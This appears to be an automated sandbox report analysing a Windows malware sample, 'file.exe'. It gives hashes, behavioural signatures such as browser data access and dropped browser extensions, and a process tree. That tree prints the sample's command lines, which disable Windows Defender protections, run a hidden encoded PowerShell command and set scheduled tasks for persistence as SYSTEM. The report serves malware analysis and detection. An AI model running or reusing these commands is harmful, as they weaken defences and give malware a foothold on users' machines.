Analysis
-
max time kernel
93s -
max time network
131s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
27/09/2022, 21:02
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
e4a0103c8a10ea20870e3c515ffc360d
-
SHA1
584675c40df4cf1da2137b88d802b409341af3de
-
SHA256
2be778280986a1326e5d1e4a83300522d2a93e3ff0e73502dce70337fcc5dbc1
-
SHA512
a930dcc1694b23c458dc7d7b389c1385a78ea54b93fa002be51f92b91cc690776a700ead056088dde493fbc212d30979ec075706c3428725da834ecd0f99bc9a
-
SSDEEP
98304:91O4OX6RcoJCtnnLTOgoDzGSJ+W4sA3lUk4O5p/yk2+XJWynOVJcVCyWjwU3Fa6z:91O4g6SntLq6SvHk4EMk2+EeqGRUW8p
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 67 3784 rundll32.exe 68 3784 rundll32.exe 70 3784 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1924 Install.exe 4940 Install.exe 2216 WeBZdVg.exe 1040 oaZcBNQ.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation oaZcBNQ.exe -
Loads dropped DLL 1 IoCs
pid Process 3784 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json oaZcBNQ.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json oaZcBNQ.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\goiejopegncpjmocklmfiipofdbkhpic\1.0.0.0\manifest.json oaZcBNQ.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini oaZcBNQ.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\48F3BB146086CEF37D471FBE460215C9 oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 oaZcBNQ.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\48F3BB146086CEF37D471FBE460215C9 oaZcBNQ.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini WeBZdVg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 oaZcBNQ.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol WeBZdVg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA oaZcBNQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA oaZcBNQ.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\YXenbgn.dll oaZcBNQ.exe File created C:\Program Files (x86)\jNivjIkKU\ERuqty.dll oaZcBNQ.exe File created C:\Program Files (x86)\jNivjIkKU\UQizKzN.xml oaZcBNQ.exe File created C:\Program Files (x86)\VYxEjiIKDDwYC\Banzrdx.dll oaZcBNQ.exe File created C:\Program Files (x86)\WrbOaSOTQfUn\ArmeRdP.dll oaZcBNQ.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi oaZcBNQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja oaZcBNQ.exe File created C:\Program Files (x86)\HCxyEYsLPoBU2\jHIYxfh.xml oaZcBNQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi oaZcBNQ.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak oaZcBNQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak oaZcBNQ.exe File created C:\Program Files (x86)\HCxyEYsLPoBU2\CEfRFuKqGtsyl.dll oaZcBNQ.exe File created C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\mRAOZot.xml oaZcBNQ.exe File created C:\Program Files (x86)\VYxEjiIKDDwYC\TBuwYoa.xml oaZcBNQ.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bGKvUxYEKJhmpNiCsB.job schtasks.exe File created C:\Windows\Tasks\GyQsokuHCPHrPIKjm.job schtasks.exe File created C:\Windows\Tasks\ydofTeYvCFRiBkl.job schtasks.exe File created C:\Windows\Tasks\BTdQtQCLlbasEjBtK.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2196 schtasks.exe 3992 schtasks.exe 4556 schtasks.exe 4520 schtasks.exe 4124 schtasks.exe 3520 schtasks.exe 3420 schtasks.exe 3268 schtasks.exe 3768 schtasks.exe 4156 schtasks.exe 524 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" oaZcBNQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing oaZcBNQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{06969d78-0000-0000-0000-d01200000000}\MaxCapacity = "15140" oaZcBNQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix oaZcBNQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{06969d78-0000-0000-0000-d01200000000} oaZcBNQ.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" oaZcBNQ.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" oaZcBNQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket oaZcBNQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 2136 powershell.EXE 2136 powershell.EXE 2620 powershell.exe 2620 powershell.exe 3644 powershell.exe 3644 powershell.exe 2324 powershell.EXE 2324 powershell.EXE 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe 1040 oaZcBNQ.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2136 powershell.EXE Token: SeDebugPrivilege 2620 powershell.exe Token: SeDebugPrivilege 3644 powershell.exe Token: SeDebugPrivilege 2324 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1688 wrote to memory of 1924 1688 file.exe 82 PID 1688 wrote to memory of 1924 1688 file.exe 82 PID 1688 wrote to memory of 1924 1688 file.exe 82 PID 1924 wrote to memory of 4940 1924 Install.exe 83 PID 1924 wrote to memory of 4940 1924 Install.exe 83 PID 1924 wrote to memory of 4940 1924 Install.exe 83 PID 4940 wrote to memory of 4580 4940 Install.exe 84 PID 4940 wrote to memory of 4580 4940 Install.exe 84 PID 4940 wrote to memory of 4580 4940 Install.exe 84 PID 4940 wrote to memory of 1808 4940 Install.exe 86 PID 4940 wrote to memory of 1808 4940 Install.exe 86 PID 4940 wrote to memory of 1808 4940 Install.exe 86 PID 4580 wrote to memory of 1748 4580 forfiles.exe 88 PID 4580 wrote to memory of 1748 4580 forfiles.exe 88 PID 4580 wrote to memory of 1748 4580 forfiles.exe 88 PID 1808 wrote to memory of 3444 1808 forfiles.exe 89 PID 1808 wrote to memory of 3444 1808 forfiles.exe 89 PID 1808 wrote to memory of 3444 1808 forfiles.exe 89 PID 1748 wrote to memory of 1040 1748 cmd.exe 90 PID 1748 wrote to memory of 1040 1748 cmd.exe 90 PID 1748 wrote to memory of 1040 1748 cmd.exe 90 PID 3444 wrote to memory of 2156 3444 cmd.exe 91 PID 3444 wrote to memory of 2156 3444 cmd.exe 91 PID 3444 wrote to memory of 2156 3444 cmd.exe 91 PID 1748 wrote to memory of 4740 1748 cmd.exe 92 PID 1748 wrote to memory of 4740 1748 cmd.exe 92 PID 1748 wrote to memory of 4740 1748 cmd.exe 92 PID 3444 wrote to memory of 4172 3444 cmd.exe 93 PID 3444 wrote to memory of 4172 3444 cmd.exe 93 PID 3444 wrote to memory of 4172 3444 cmd.exe 93 PID 4940 wrote to memory of 3520 4940 Install.exe 97 PID 4940 wrote to memory of 3520 4940 Install.exe 97 PID 4940 wrote to memory of 3520 4940 Install.exe 97 PID 4940 wrote to memory of 3452 4940 Install.exe 99 PID 4940 wrote to memory of 3452 4940 Install.exe 99 PID 4940 wrote to memory of 3452 4940 Install.exe 99 PID 2136 wrote to memory of 532 2136 powershell.EXE 103 PID 2136 wrote to memory of 532 2136 powershell.EXE 103 PID 4940 wrote to memory of 1476 4940 Install.exe 111 PID 4940 wrote to memory of 1476 4940 Install.exe 111 PID 4940 wrote to memory of 1476 4940 Install.exe 111 PID 4940 wrote to memory of 3420 4940 Install.exe 113 PID 4940 wrote to memory of 3420 4940 Install.exe 113 PID 4940 wrote to memory of 3420 4940 Install.exe 113 PID 2216 wrote to memory of 2620 2216 WeBZdVg.exe 117 PID 2216 wrote to memory of 2620 2216 WeBZdVg.exe 117 PID 2216 wrote to memory of 2620 2216 WeBZdVg.exe 117 PID 2620 wrote to memory of 2232 2620 powershell.exe 119 PID 2620 wrote to memory of 2232 2620 powershell.exe 119 PID 2620 wrote to memory of 2232 2620 powershell.exe 119 PID 2232 wrote to memory of 1720 2232 cmd.exe 120 PID 2232 wrote to memory of 1720 2232 cmd.exe 120 PID 2232 wrote to memory of 1720 2232 cmd.exe 120 PID 2620 wrote to memory of 3724 2620 powershell.exe 121 PID 2620 wrote to memory of 3724 2620 powershell.exe 121 PID 2620 wrote to memory of 3724 2620 powershell.exe 121 PID 2620 wrote to memory of 2196 2620 powershell.exe 122 PID 2620 wrote to memory of 2196 2620 powershell.exe 122 PID 2620 wrote to memory of 2196 2620 powershell.exe 122 PID 2620 wrote to memory of 3500 2620 powershell.exe 123 PID 2620 wrote to memory of 3500 2620 powershell.exe 123 PID 2620 wrote to memory of 3500 2620 powershell.exe 123 PID 2620 wrote to memory of 4280 2620 powershell.exe 124 PID 2620 wrote to memory of 4280 2620 powershell.exe 124
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Users\Admin\AppData\Local\Temp\7zS6FF5.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Users\Admin\AppData\Local\Temp\7zS72F2.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1748 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1040
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4740
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3444 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2156
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:4172
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggJjDwhKD" /SC once /ST 11:34:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:3520
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggJjDwhKD"4⤵PID:3452
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggJjDwhKD"4⤵PID:1476
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bGKvUxYEKJhmpNiCsB" /SC once /ST 23:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\edOhJgpRjaWAiDb\WeBZdVg.exe\" G6 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3420
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:532
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4076
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2756
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1140
-
C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\edOhJgpRjaWAiDb\WeBZdVg.exeC:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\edOhJgpRjaWAiDb\WeBZdVg.exe G6 /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2216 -
